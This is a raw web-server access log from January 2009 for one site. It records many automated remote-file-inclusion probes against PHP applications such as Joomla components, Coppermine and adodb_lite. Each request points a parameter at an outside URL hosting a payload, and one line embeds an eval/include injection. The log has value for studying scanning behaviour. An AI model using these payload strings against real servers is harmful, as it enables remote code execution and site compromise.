207.182.137.218 - - [06/Jan/2009:09:13:39 -0800] "GET /logs/access_081120.log//?_zb_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:40 -0800] "GET /logs/access_080504.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:43 -0800] "GET /logs/access_080804.log/print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:44 -0800] "GET /logs/print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:13:44 -0800] "GET /print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:13:47 -0800] "GET /logs/access_081114.log/modifyform.html?code=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:13:58 -0800] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:13:58 -0800] "GET /logs/access_080929.log/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:13:59 -0800] "GET /logs/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:14:06 -0800] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.71.77 - - [06/Jan/2009:09:14:16 -0800] "GET /logs/access_080401.log/errors.php?error=http://dowgroup.com//phplive/web/groups/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.71.77 - - [06/Jan/2009:09:14:17 -0800] "GET /errors.php?error=http://dowgroup.com//phplive/web/groups/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.71.77 - - [06/Jan/2009:09:14:17 -0800] "GET /logs/errors.php?error=http://dowgroup.com//phplive/web/groups/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:14:42 -0800] "GET /logs/access_080828.log/print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:14:44 -0800] "GET /logs/access_090103.log//apboard/index.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:14:45 -0800] "GET /logs/access_080810.log/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:56 -0800] "GET /logs/access_080412.log%20%20/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:56 -0800] "GET /logs/access_080412.log%20%20/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:56 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:56 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:56 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94763 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94763 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94747 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:14:57 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94747 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:15:01 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:15:02 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:15:08 -0800] "GET /logs/access_080524.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:15:10 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:15:10 -0800] "GET /apboard/index.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:15:10 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:15:11 -0800] "GET /logs//apboard/index.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:15:12 -0800] "GET /logs/access_080828.log/print.php?page=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
161.58.71.77 - - [06/Jan/2009:09:15:19 -0800] "GET /logs/access_080511.log/errors.php?error=http://dowgroup.com//phplive/web/groups/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:15:34 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:15:39 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:15:42 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:15:51 -0800] "GET /logs/access_080524.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:15:51 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:15:52 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:15:54 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:15:56 -0800] "GET /logs/access_081212.log//?_zb_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:15:56 -0800] "GET /logs//?_zb_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:15:57 -0800] "GET /?_zb_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 94710 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:15:59 -0800] "GET /logs/access_080831.log%20%20/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:16:05 -0800] "GET /logs/access_081120.log//?_zb_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.29.78.145 - - [06/Jan/2009:09:16:06 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [06/Jan/2009:09:16:06 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [06/Jan/2009:09:16:06 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [06/Jan/2009:09:16:10 -0800] "GET /logs/access_080311.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.kortech.cn/bbs//skin/zero_vote//images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:16:39 -0800] "GET /logs/access_080503.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:16:39 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:16:42 -0800] "GET /logs/access_080831.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:17:00 -0800] "GET /logs/access_080601.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:17:01 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:17:01 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:17:14 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:17:35 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:17:38 -0800] "GET /logs/access_081212.log//apboard/index.php?APB_rp=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:17:44 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:17:44 -0800] "GET /logs//?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:17:45 -0800] "GET /?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 200 94924 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:17:54 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:17:54 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:17:54 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:18:07 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:18:07 -0800] "GET /logs//?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:18:09 -0800] "GET /?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 200 94924 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:18:18 -0800] "GET /logs/access_080704.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:19 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:19 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:19 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 200 81172 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:20 -0800] "GET /?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 200 94749 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:18:43 -0800] "GET /logs/access_080503.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:18:43 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:18:43 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:45 -0800] "GET /logs/access_080714.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:46 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:46 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94763 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:51 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:51 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:18:51 -0800] "GET /logs/access_081207.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:51 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 200 81172 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:18:51 -0800] "GET /modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:52 -0800] "GET /?sourcedir=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 200 94765 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:18:52 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:18:53 -0800] "GET /logs/access_080831.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:59 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:59 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:59 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 200 81172 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:18:59 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 200 81172 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:19:00 -0800] "GET /?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 200 94791 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:19:00 -0800] "GET /?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 200 94743 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:19:04 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:19:04 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:19:16 -0800] "GET /logs/access_080213.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:19:24 -0800] "GET /errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:19:24 -0800] "GET /logs/errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:19:24 -0800] "GET /logs/access_080113.log/errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:19:24 -0800] "GET /logs/access_080115.log/errors.php?error=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.25.112.69 - - [06/Jan/2009:09:19:44 -0800] "GET /logs/access_080226.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
193.25.112.69 - - [06/Jan/2009:09:19:44 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
193.25.112.69 - - [06/Jan/2009:09:19:44 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
193.25.112.69 - - [06/Jan/2009:09:19:44 -0800] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:19:48 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:19:48 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:09:19:54 -0800] "GET /logs/access_080826.log%20/index1.php?id=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:20:14 -0800] "GET /logs/access_080426.log/index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
